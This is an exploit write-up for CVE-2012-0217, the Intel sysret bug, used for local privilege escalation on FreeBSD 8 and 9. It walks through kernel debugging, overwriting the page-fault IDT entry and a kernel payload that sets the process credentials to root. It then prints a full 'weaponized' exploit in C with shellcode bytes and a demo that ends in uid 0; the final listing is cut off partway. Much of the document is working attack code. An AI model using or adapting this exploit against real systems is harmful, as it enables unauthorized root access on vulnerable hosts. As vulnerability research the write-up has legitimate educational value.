CVE-2012-0217: Intel's sysret Kernel Privilege Escalation (on FreeBSD)

CVE-2012-0217 was reported by Rafal Wojtczuk. Ironically, the same issue had already been fixed in Linux in 2006 (see CVE-2006-0744) without receiving much attention.

It is quite an interesting vulnerability in many respects. Among them, and thanks to its hardware basis, it impacts many operating systems. For instance, as long as they run on an Intel processor in long mode (obviously), FreeBSD, NetBSD, Solaris, Xen and Microsoft Windows have been reported to be vulnerable. This therefore gives us quite an incentive to develop an exploit ;).

If you haven’t yet read Xen’s blog post, The Intel SYSRET privilege escalation, please do, because we won’t go into much detail about the vulnerability itself again.

Without further delay, let’s dig right into the FreeBSD exploitation!

Overview

While developing an exploit, it helps to keep a mental or written TODO list and/or roadmap to a successful exploitation. Here is one, in chronological order of exploitation:

  • A way to debug the kernel! (You really think one shot is all it takes? ;) )
  • Information gathering
  • Code to trigger the vulnerability
  • Getting arbitrary code execution
  • Keeping the kernel stable
  • Recovering from the general protection fault exception (#GP)
  • Privilege escalation
  • Returning to a userland shellcode
  • (3) Profit ;)

Of course this is not necessarily the order you follow when trying to come up with ideas to solve them. You don’t always (often?) even have a full roadmap until you actually come up with random ideas, ideas which slowly gather, start to make sense and flow together.

Kernel debugging

This is one of the most important items. Having a good debugging environment goes a long way toward a successful exploitation.

Many configurations could work; in this case, we run and debug the target OS (FreeBSD) under VMware Fusion on Mac OS X.

Indeed, VMware provides an easy way to debug the guest OS through a debug stub. Enabling it is easy: edit the .vmx file you’ll find inside your VMware VM (Right Click->Show Package Contents), and add the following line:

debugStub.listen.guest64 = "TRUE"

With this magic configuration line, VMware listens on port 8864 and you can now debug your VM’s OS using gdb’s target command:

(gdb) target remote localhost:8864

But for this to be useful, we need to configure and cross-compile GDB for the FreeBSD target environment (amd64-marcel-freebsd), which lets us load FreeBSD’s kernel symbols into gdb. This requires gettext, gmp, and libelf, but you can use MacPorts to install them.

As an example, using gdb 7.4.1:

% sudo port install gettext gmp libelf
[...]
% curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2
[...]
% tar xvjf gdb-7.4.1.tar.bz2
[...]
% cd gdb-7.4.1
gdb-7.4.1 % CFLAGS=-I/opt/local/include ./configure --prefix=/opt/local --program-suffix=-amd64-marcel-freebsd --target=amd64-marcel-freebsd
[...]
gdb-7.4.1 % make
[...]
gdb-7.4.1 % make install

And finally, just copy FreeBSD’s /usr/src and /boot/kernel/ directories to Mac OS X.

And voila, you’re set!

% ls
kernel/ usr/
% gdb-amd64-marcel-freebsd -q -tui kernel/kernel
┌──Register group: general─────────────────────────────────────────────┐
│rax            0x0      0                                             │
│rbx            0x0      0                                             │
│rcx            0x100b   4107                                          │
│rdx            0x1008   4104                                          │
│rsi            0xffffff80001f6b54       -549753754796                 │
│rdi            0x1008   4104                                          │
│rbp            0xffffff80001f6b30       0xffffff80001f6b30            │
│rsp            0xffffff80001f6b30       0xffffff80001f6b30            │
│r8             0x0      0                                             │
│r9             0x0      0                                             │
│r10            0x2      2                                             │
│r11            0xffffffff8022fdb0       -2145190480                   │
│r12            0xffffff0002286200       -1099475426816                │
│r13            0xffffff0002286228       -1099475426776                │
    ┌──/usr/src/sys/amd64/acpica/acpi_machdep.c─────────────────────────┐
    │96      {                                                          │
    │97              return (0);                                        │
    │98      }                                                          │
    │99                                                                 │
    │100     void                                                       │
    │101     acpi_cpu_c1()                                              │
    │102     {                                                          │
    │103             __asm __volatile("sti; hlt");                      │
   >│104     }                                                          │
    │105                                                                │
    │106     /*                                                         │
    │107      * Support for mapping ACPI tables during early boot.  Curr│
    │108      * uses the crashdump map to map each table.  However, the │
    │109      * map is created in pmap_bootstrap() right after the direc│
    └───────────────────────────────────────────────────────────────────┘
remote Thread 1 In: acpi_cpu_c1       Line: 104  PC: 0xffffffff8092d1d6
Reading symbols from kernel/kernel...done.
(gdb) target remote localhost:8864
Remote debugging using localhost:8864
acpi_cpu_c1 () at /usr/src/sys/amd64/acpica/acpi_machdep.c:104
(gdb) 

NB: you can change the -tui layout using ctrl+x 2 multiple times

One warning though: you can’t easily step through anything. For instance, if you single-step through the function Xfast_syscall [1], the code

cli
testl $PCB_FULL_IRET,PCB_FLAGS(%rax)

would detect it needs a full iret and won’t use the sysret instruction.

The trick is therefore to set your breakpoints directly at the #GP and/or double fault handlers (resp. Xprot() [2] and Xdblfault() [3]), which are triggered right after the sysret instruction executes. From there, you won’t have any trouble single-stepping, and you’ll even see the page fault trigger once the kernel tries to access some gs:data (we’ll see why soon enough).

Information gathering

During exploitation, we need a few kernel symbol addresses. Under FreeBSD we’re in luck: the kldsym() function provides an easy way for symbol lookups as shown by the following get_symaddr() function.

u_long get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof (ksym);
    ksym.symname = symname;

    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

Vulnerability Triggering

Triggering the vulnerability is easy:

  • Allocate a page just before the non-canonical address boundary 0x0000800000000000
  • Call an arbitrary syscall using the syscall instruction right before the non-canonical address boundary

When the fastsyscall handler restores the user’s registers, executes sysret and therefore tries to return to the “next instruction” at 0x0000800000000000, on Intel’s processors, a #GP is triggered while still in kernel mode. Furthermore, an exception frame is pushed to the stack, which now happens to be the userland’s stack. Thus, we can trigger a kernel write to a location which is user controlled!

Hence, the following triggering code

uint64_t pagesize = getpagesize();
uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
area = mmap(area, pagesize,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
    perror("mmap (trigger)");
    exit(1);
}

// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
char triggercode[] =
    "\xb8\x18\x00\x00\x00" // mov eax, 24; #getuid (the 32-bit write zero-extends into rax)
    "\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
    "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
    "\x0f\x05"; // syscall

uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
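The address arithmetic behind this placement can be checked in isolation. The following is only a sketch: is_canonical48() and return_address_after_syscall() are hypothetical helper names, and 48-bit virtual addressing is assumed. It shows that the instruction following a syscall placed flush against the end of the last user page sits at 0x0000800000000000, which is not canonical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: true when bits 63..47 of addr are all equal,
 * i.e. addr is canonical under 48-bit virtual addressing (assumed). */
static bool is_canonical48(uint64_t addr)
{
    uint64_t top = addr >> 47;              /* bits 63..47, 17 bits wide */
    return top == 0 || top == 0x1FFFF;
}

/* Address of the instruction that follows a syscall placed flush
 * against the end of the page ending at 1 << 47. */
static uint64_t return_address_after_syscall(uint64_t pagesize)
{
    const uint64_t syscall_len = 2;                 /* 0x0f 0x05 */
    uint64_t page_base = (1ULL << 47) - pagesize;   /* last user page */
    uint64_t syscall_addr = page_base + pagesize - syscall_len;

    return syscall_addr + syscall_len;
}
```

With a 4096-byte page, return_address_after_syscall() yields 0x0000800000000000 and is_canonical48() rejects it, while both the last user byte and a typical kernel address pass the check.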

The question now is, what do we set rsp to?

Follow the white rabbit…

Arbitrary code execution

There are two outcomes given a target rsp:

  • if rsp can’t be written to, a double fault is triggered (Xdblfault() [3]) and the exception frame is pushed to a special stack
  • otherwise a #GP is triggered (Xprot() [2]) and the exception frame is pushed to [rsp]

In the latter case, the trouble is (or is it?)… The #GP triggers a page fault (Xpage() [4]). Let’s see why.

IDTVEC(prot)
    subq    $TF_ERR,%rsp
    movl    $T_PROTFLT,TF_TRAPNO(%rsp)                               [1]
    movq    $0,TF_ADDR(%rsp)                                         [2]
    movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */          [3]
    leaq    doreti_iret(%rip),%rdi
    cmpq    %rdi,TF_RIP(%rsp)
    je  1f          /* kernel but with user gsbase!! */
    testb   $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */ [4]
    jz  2f          /* already running with kernel GS.base */
1:  swapgs
2:  movq    PCPU(CURPCB),%rdi                                        [5]

[4] sets the Z flag because we come from the kernel (while executing sysret) and we therefore skip the swapgs instruction. But in this particular chain of events, GS is in fact the user’s GS.base! Indeed it was restored just before calling sysret… Hence, accessing gs:data at [5] triggers a page fault (Xpage() [4]).
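The decision made at [4] boils down to a two-bit test on the saved code selector. Here is a rough sketch of it; handler_runs_swapgs() is a hypothetical name, the selector values 0x20 and 0x43 mentioned afterwards are only illustrative ring-0 and ring-3 selectors, and the separate doreti_iret comparison is left out.

```c
#include <stdbool.h>
#include <stdint.h>

/* Low two bits of a selector: the requested privilege level (RPL). */
#define SKETCH_RPL_MASK 3u

/* Mirrors "testb $SEL_RPL_MASK,TF_CS(%rsp); jz 2f": swapgs is only
 * executed when the saved cs says the fault came from ring 3. */
static bool handler_runs_swapgs(uint16_t saved_cs)
{
    return (saved_cs & SKETCH_RPL_MASK) != 0;
}
```

A saved cs with RPL 0 (0x20 here) makes the handler skip swapgs, which is exactly the wrong choice when the fault is raised by sysret after the user's GS.base has been restored.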

If we don’t do anything we’ll eventually double fault, triple fault etc. and crash miserably.

We therefore need a way:

  1. to recover from the #GP
  2. to clean any mess we did/overwrote

Both could be solved if we can get arbitrary code execution by the time we reach [5]. (NB: this is not mandatory, we could get the code execution later down the fault trigger chain)

So… here is the idea: wouldn’t it be nice if we could overwrite the page fault handler’s address and therefore get code execution when [5] triggers the #PF?

Yes indeed, and that’s how we’re going to exploit it :-)

First a few structures for reference:

Gate descriptor:
+0:  Target Offset[15:0] | Target Selector
+4:  Some stuff          | Target Offset[31:16]
+8:  Target Offset[63:32]
+12: Some more stuff

and from include/frame.h:

struct trapframe {
    register_t  tf_rdi;
    register_t  tf_rsi;
    register_t  tf_rdx;
    register_t  tf_rcx;
    register_t  tf_r8;
    register_t  tf_r9;
    register_t  tf_rax;
    register_t  tf_rbx;
    register_t  tf_rbp;
    register_t  tf_r10;
    register_t  tf_r11;
    register_t  tf_r12;
    register_t  tf_r13;
    register_t  tf_r14;
    register_t  tf_r15;
    uint32_t    tf_trapno;
    uint16_t    tf_fs;
    uint16_t    tf_gs;
    register_t  tf_addr;
    uint32_t    tf_flags;
    uint16_t    tf_es;
    uint16_t    tf_ds;
    /* below portion defined in hardware */
    register_t  tf_err;
    register_t  tf_rip;
    register_t  tf_cs;
    register_t  tf_rflags;
    register_t  tf_rsp;
    register_t  tf_ss;
};

When the exception is triggered, the hardware pushes ss, rsp, rflags, cs, rip and err.

We can see that [1], [2] and [3] write to the stack.

  • [3] is fully user-controlled through rdi, so we could try to align rsp such that [3] overwrites the #PF’s offset address.

    The trouble is… rsp is automatically 16-byte aligned when an exception is triggered, so tf_rdi always lands on the first 8 bytes of a gate descriptor. We can therefore only overwrite the low 32 bits of the offset address (check how tf_rdi is 16-byte aligned in this trapframe if you don’t understand why).

  • [2] writes 0 to tf_addr which is also 16-byte aligned. So no dice.

  • That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno and tf_trapno is 16-byte aligned + 8! This enables us to set Target Offset[63:32] to 0x9.
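The alignment claims in the list above can be verified with offsetof. This is a minimal sketch: struct trapframe_sketch is a local replica of the structure shown earlier, register_t is assumed to be a 64-bit integer, and TF_MOD16 and tf_field_addr() are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>

/* Local replica of the amd64 trapframe; register_t assumed to be 64-bit. */
struct trapframe_sketch {
    uint64_t tf_rdi, tf_rsi, tf_rdx, tf_rcx, tf_r8, tf_r9, tf_rax, tf_rbx;
    uint64_t tf_rbp, tf_r10, tf_r11, tf_r12, tf_r13, tf_r14, tf_r15;
    uint32_t tf_trapno;
    uint16_t tf_fs, tf_gs;
    uint64_t tf_addr;
    uint32_t tf_flags;
    uint16_t tf_es, tf_ds;
    /* below portion defined in hardware */
    uint64_t tf_err, tf_rip, tf_cs, tf_rflags, tf_rsp, tf_ss;
};

/* Offset of a field modulo 16. The frame base itself is 16-byte aligned:
 * the CPU aligns rsp, then the whole frame occupies 192 bytes below it. */
#define TF_MOD16(field) (offsetof(struct trapframe_sketch, field) % 16)

/* Address a field ends up at, given rsp at the time of the fault. */
static uint64_t tf_field_addr(uint64_t rsp_at_fault, size_t field_off)
{
    uint64_t aligned = rsp_at_fault & ~(uint64_t)15;
    uint64_t base = aligned - sizeof(struct trapframe_sketch);

    return base + field_off;
}
```

TF_MOD16(tf_rdi) and TF_MOD16(tf_addr) are both 0, whereas TF_MOD16(tf_trapno) is 8, which is why only tf_trapno can line up with the +8 field of a 16-byte gate descriptor.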

Thus, if we set rsp to &idt[14] + 10*8 (to align tf_trapno with the #PF’s Target Offset[63:32]), we can set the #PF handler’s address to 0x9WWXXYYZZ.

Furthermore, WWXXYYZZ is known since we can get the #PF handler’s address through get_symaddr(). To get arbitrary code execution, the idea is therefore to set up a trampoline at 0x9WWXXYYZZ, which contains some setup code and a jump to our kernel mode payload (pointed to by rax in the following code).

*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);

char trampolinecode[] =
    "\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
    "\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
    "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
    "\xff\xe0"; // jmp rax

uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;
// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
    trampoline_allocsize += pagesize;
if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
{
    perror("mmap (trampoline)");
    exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
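As a worked example of the address computation above, here is a small sketch; redirected_handler() and pages_needed() are hypothetical helpers, and the Xpage value used afterwards is simply the one printed in the demo output further down. It computes where the corrupted gate points and how many pages a mapping must cover.

```c
#include <stddef.h>
#include <stdint.h>

/* Handler address once Target Offset[63:32] has been replaced by new_high. */
static uint64_t redirected_handler(uint64_t handler, uint32_t new_high)
{
    return ((uint64_t)new_high << 32) | (handler & 0xFFFFFFFFULL);
}

/* Number of pages a len-byte blob starting at addr spans (len > 0). */
static size_t pages_needed(uint64_t addr, size_t len, uint64_t pagesize)
{
    uint64_t first = addr & ~(pagesize - 1);
    uint64_t last = (addr + len - 1) & ~(pagesize - 1);

    return (size_t)((last - first) / pagesize) + 1;
}
```

With Xpage resolved to 0xffffffff80b03240 and T_PROTFLT equal to 9, redirected_handler() gives 0x980b03240, and the 18-byte trampoline fits in a single 4096-byte page. A second page would only be needed if the low 12 bits of the address left fewer than 18 bytes before the page end.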

Keeping the kernel stable

Getting a root shell and crashing after 1us is no fun, is it? We’d better restore whatever we overwrote in kernel space while trying to achieve code execution…

Let’s summarize what we smashed with rsp initialized to &idt[14] + 10*8, i.e. &idt[19]:

  • The #GP exception frame writes 6*64bit registers, i.e. it overwrites idt[18], idt[17] and idt[16]
  • tf_addr overwrites the 64-LSB of idt[15]
  • tf_trapno overwrites the Target Offset[63:32] field of idt[14]
  • rdi overwrites the 64-LSB of idt[7]
  • The #PF exception frame overwrites idt[6], idt[5] and idt[4]

Thus overall, the IDT’s entries 4, 5, 6, 7, 14, 15, 16, 17, and 18 need to be restored and we should be safe. Note that FreeBSD’s IDT_MF, IDT_AC, IDT_MC and IDT_XF macros are vectors 16, 17, 18 and 19, so the code below rewrites entries 16 to 19 and leaves the low 64 bits of vector 15 clobbered, which presumably goes unnoticed because that vector is reserved by Intel.

struct gate_descriptor *idt = sidt();
setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 19
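The list of smashed entries can be double-checked with a bit of byte-offset bookkeeping. The following is only a sketch under the assumptions stated in the comments (16-byte gates, a 48-byte hardware frame, and the trapframe offsets from the structure shown earlier); mark() and smashed_entries() are hypothetical names.

```c
#include <stdint.h>

#define GATE_SIZE 16u   /* bytes per long-mode gate descriptor */
#define HW_FRAME  48u   /* ss, rsp, rflags, cs, rip, err */
#define TF_SIZE   192u  /* sizeof(struct trapframe) */
#define TF_TRAPNO 120u  /* offset of tf_trapno */
#define TF_ADDR   128u  /* offset of tf_addr */

/* Set bit i of mask for every IDT entry i touched by [off, off + len). */
static uint32_t mark(uint32_t mask, uint32_t off, uint32_t len)
{
    for (uint32_t b = off; b < off + len; b++)
        mask |= 1u << (b / GATE_SIZE);
    return mask;
}

/* rsp_off is the byte offset of the chosen rsp from the IDT base. */
static uint32_t smashed_entries(uint32_t rsp_off)
{
    uint32_t top = rsp_off & ~15u;   /* the CPU aligns rsp first */
    uint32_t tf = top - TF_SIZE;     /* trapframe base seen by Xprot */
    uint32_t mask = 0;

    mask = mark(mask, top - HW_FRAME, HW_FRAME); /* #GP hardware frame */
    mask = mark(mask, tf + TF_TRAPNO, 4);        /* movl $T_PROTFLT */
    mask = mark(mask, tf + TF_ADDR, 8);          /* movq $0 */
    mask = mark(mask, tf, 8);                    /* movq %rdi */
    mask = mark(mask, tf - HW_FRAME, HW_FRAME);  /* #PF hardware frame */
    return mask;
}
```

For rsp_off = 14*16 + 10*8 the result is 0x7C0F0, i.e. bits 4 to 7 and 14 to 18, matching the summary above.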

Privilege escalation

This part is quite standard and easy: we just need to retrieve the address of the current user credentials struct, and set the various IDs to 0 (root).

Knowing that the address of the current thread struct can be read from gs:0 under FreeBSD, this yields the following code.

struct thread *td;
struct ucred *cred;

// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));

// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;

Shellcode

Finally… We return to our userland shellcode using the sysret instruction.

// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx

And the shellcode? What shellcode? :P

The user credentials struct is cached/shared among the user’s processes. Since we modified it, the caller’s shell will automagically inherit this privilege escalation.

Hence the following shellcode ;-)

void shellcode()
{
    // Actually we dont really need to spawn a shell since we
    // changed our whole cred struct.
    // Just exit...
    printf("[*] Got root!\n");
    exit(0);
}

Demo

$ uname -a
FreeBSD FreeBSD 9.0 64bit 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(qwerty) gid=1001(qwerty) groups=1001(qwerty)
$ ls -l
total 24
-rwxr-xr-x  1 qwerty  qwerty  11693 Jul  5 17:49 CVE-2012-0217
-rw-r--r--  1 qwerty  qwerty  10763 Jul  5 17:49 CVE-2012-0217.c
$ ./CVE-2012-0217
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)

[*] Retrieving host information...
    [+] CPU: GenuineIntel
    [+] sysname: FreeBSD
    [+] release: 9.0-RELEASE
    [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
    [+] machine: amd64
[*] Validating target OS and version...
    [+] Vulnerable :-)
[*] Resolving kernel addresses...
    [+] Resolved Xofl to 0xffffffff80b02e70
    [+] Resolved Xbnd to 0xffffffff80b02ea0
    [+] Resolved Xill to 0xffffffff80b02ed0
    [+] Resolved Xdna to 0xffffffff80b02f00
    [+] Resolved Xpage to 0xffffffff80b03240
    [+] Resolved Xfpu to 0xffffffff80b02fc0
    [+] Resolved Xalign to 0xffffffff80b03080
    [+] Resolved Xmchk to 0xffffffff80b02f60
    [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] Setup...
    [+] Trigger code...
    [+] Trampoline code...
[*] Fire in the hole!
[*] Got root!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

Final words

The final exploit is quite stable, recovers nicely and exits back to the user’s shell. It works on both FreeBSD 8 and 9 (and probably 7) as-is with the stock kernels, without any need for special magic hardcoded values; but of course the environment could be hardened.

To conclude: the mandatory video :-)

And… That’s a wrap!

Hope you enjoyed it. Feel free to comment or discuss other exploitation paths.

[1] Xfast_syscall is defined in sys/amd64/amd64/exception.S
[2] Xprot is defined in sys/amd64/amd64/exception.S
[3] Xdblfault is defined in sys/amd64/amd64/exception.S
[4] Xpage is defined in sys/amd64/amd64/exception.S

The full weaponized exploit
also available on github

// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()
{
    struct region_descriptor idt;

    asm ("sidt %0": "=m"(idt));

    return (struct gate_descriptor*)idt.rd_base;
}

u_long get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof (ksym);
    ksym.symname = symname;

    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

// Code taken from amd64/amd64/machdep.c
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
    struct gate_descriptor *ip;

    ip = idt + idx;
    ip->gd_looffset = func;
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
    ip->gd_ist = ist;
    ip->gd_xx = 0;
    ip->gd_type = typ;
    ip->gd_dpl = dpl;
    ip->gd_p = 1;
    ip->gd_hioffset = func>>16;
}

void shellcode()
{
    // Actually we dont really need to spawn a shell since we
    // changed our whole cred struct.
    // Just exit...
    printf("[*] Got root!\n");
    exit(0);
}

void kernelmodepayload()
{
    struct thread *td;
    struct ucred *cred;

    // We need to restore/recover whatever we smashed
    // We initialized rsp to &idt[14] + 10*8, i.e. &idt[19] (see trigger())
    // The #GP exception frame writes 6*64bit registers, i.e. it overwrites
    // idt[18], idt[17] and idt[16]
    // thus overall we have:
    // - idt[18], idt[17] and idt[16] are trashed
    // - tf_addr -> overwrites the 64bit-LSB of idt[15]
    // - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
    // - rdi -> overwrites the 64bit-LSB of idt[7]
    // - #PF exception frame overwrites idt[6], idt[5] and idt[4]
    // NB: IDT_MF, IDT_AC, IDT_MC and IDT_XF are vectors 16 to 19, so the
    // reserved vector 15 is not rewritten below
    struct gate_descriptor *idt = sidt();
    setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
    setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
    setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
    setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
    setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
    setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
    setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
    setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
    setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 19

    // get the thread pointer
    asm ("mov %%gs:0, %0" : "=r"(td));

    // The Dark Knight Rises
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

    // return to user mode to spawn the shell
    asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}

#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18

void trigger()
{
    printf("[*] Setup...\n");
    // Allocate one page just before the non-canonical address
    printf("    [+] Trigger code...\n");
    uint64_t pagesize = getpagesize();
    uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
    area = mmap(area, pagesize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (area == MAP_FAILED) {
        perror("mmap (trigger)");
        exit(1);
    }

    // Copy the trigger code at the end of the page
    // such that the syscall instruction is at its
    // boundary
    char triggercode[] =
        "\xb8\x18\x00\x00\x00" // mov eax, 24; #getuid (the 32-bit write zero-extends into rax)
        "\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
        "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
        "\x0f\x05"; // syscall

    uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
    memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

    // There are two outcomes given a target rsp:
    // - if rsp can't be written to, a double fault is triggered
    //   (Xdblfault defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to a special stack
    // - otherwise a #GP is triggered
    //   (Xprot defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to [rsp]
    //
    // In the latter case, trouble is... #GP triggers a page fault
    // (Xpage):
    //  IDTVEC(prot)
    //      subq    $TF_ERR,%rsp
    //  [1] movl    $T_PROTFLT,TF_TRAPNO(%rsp)
    //  [2] movq    $0,TF_ADDR(%rsp)
    //  [3] movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */
    //      leaq    doreti_iret(%rip),%rdi
    //      cmpq    %rdi,TF_RIP(%rsp)
    //      je  1f          /* kernel but with user gsbase!! */
    //  [4] testb   $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
    //      jz  2f          /* already running with kernel GS.base */
    //  1:  swapgs
    //  2:  movq    PCPU(CURPCB),%rdi [5]
    //
    // [4] sets the Z flag because we come from the kernel (while executing sysret)
    // and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
    // it was restored just before calling sysret...
    // Thus, [5] triggers a pagefault while trying to access gs:data
    // If we don't do anything we'll eventually double fault, triple fault etc. and crash
    //
    // We therefore need a way: (1) to recover from the GP, (2) to clean
    // any mess we did. Both could be solved if we can get an arbitrary
    // code execution by the time we reach [5] (NB: this is not mandatory, we could
    // get the code execution later down the fault trigger chain)
    //
    // So... here is the idea: wouldn't it be nice if we could overwrite the
    // page fault handler's address and therefore get code execution when [5]
    // triggers the #PF?
    //
    // For reference:
    // Gate descriptor:
    // +0: Target Offset[15:0] | Target Selector
    // +4: Some stuff | Target Offset[31:16]
    // +8: Target Offset[63:32]
    // +12: Stuff
    //
    // and from include/frame.h:
    //  struct trapframe {
    //      register_t  tf_rdi;
    //      register_t  tf_rsi;
    //      register_t  tf_rdx;
    //      register_t  tf_rcx;
    //      register_t  tf_r8;
    //      register_t  tf_r9;
    //      register_t  tf_rax;
    //      register_t  tf_rbx;
    //      register_t  tf_rbp;
    //      register_t  tf_r10;
    //      register_t  tf_r11;
    //      register_t  tf_r12;
    //      register_t  tf_r13;
    //      register_t  tf_r14;
    //      register_t  tf_r15;
    //      uint32_t    tf_trapno;
    //      uint16_t    tf_fs;
    //      uint16_t    tf_gs;
    //      register_t  tf_addr;
    //      uint32_t    tf_flags;
    //      uint16_t    tf_es;
    //      uint16_t    tf_ds;
    //      /* below portion defined in hardware */
    //      register_t  tf_err;
    //      register_t  tf_rip;
    //      register_t  tf_cs;
    //      register_t  tf_rflags;
    //      register_t  tf_rsp;
    //      register_t  tf_ss;
    //  };
    //
    // When the exception is triggered, the hardware pushes
    // ss, rsp, rflags, cs, rip and err
    //
    // We can see that [1], [2] and [3] write to the stack
    // [3] is fully user-controlled through rdi, so we could try to align
    // rsp such that [3] overwrites the offset address
    //
    // The trouble is... rsp is 16byte aligned for exceptions. We can
    // therefore only overwrite the first 32-LSB of the offset address
    // (check how rdi is 16byte aligned in this trapframe)
    //
